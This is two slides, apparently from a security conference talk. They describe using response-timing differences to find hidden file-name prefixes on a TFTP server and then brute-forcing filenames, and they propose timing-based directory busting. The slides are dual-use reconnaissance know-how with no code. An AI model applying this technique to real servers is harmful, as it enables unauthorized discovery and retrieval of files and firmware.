  • 27. Real case from a wild ● ● ● ● ● TFTP service Classic bruteforce w/o results Times to retrieve files are different Sort it! Find prefixes with anomaly timings: ○ rom○ firmware. ○ … ● Brute filename after prefixes
  • 28. Next steps ● And... YES! ● We want to optimize classic DirBusting technology ● For bruteforce to search through timing-attacks!